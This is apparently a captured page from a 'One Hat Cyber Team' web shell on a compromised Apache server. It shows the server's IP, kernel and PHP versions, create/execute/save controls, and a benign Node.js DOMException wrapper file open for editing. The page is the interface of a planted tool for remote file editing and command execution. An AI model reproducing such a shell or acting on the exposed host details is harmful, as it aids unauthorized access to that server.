One Hat Cyber Team
Your IP :
10.30.1.1
Server IP :
103.148.201.5
Server :
Linux web-olt 5.15.0-156-generic #166-Ubuntu SMP Sat Aug 9 00:02:46 UTC 2025 x86_64
Server Software :
Apache/2.4.52 (Ubuntu)
PHP Version :
8.1.29
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
proc
/
2141650
/
root
/
usr
/
share
/
nodejs
/
domexception
/
Edit File:
webidl2js-wrapper.js
"use strict"; const DOMException = require("./lib/DOMException.js"); // Special install function to make the DOMException inherit from Error. // https://heycam.github.io/webidl/#es-DOMException-specialness function installOverride(globalObject, globalNames) { if (typeof globalObject.Error !== "function") { throw new Error("Internal error: Error constructor is not present on the given global object."); } DOMException.install(globalObject, globalNames); Object.setPrototypeOf(globalObject.DOMException.prototype, globalObject.Error.prototype); } module.exports = { ...DOMException, install: installOverride };
Simpan